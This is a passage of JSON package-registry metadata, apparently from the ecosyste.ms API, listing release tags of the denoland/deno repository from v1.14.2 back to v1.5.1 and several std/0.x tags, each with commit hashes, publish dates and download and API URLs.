releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.co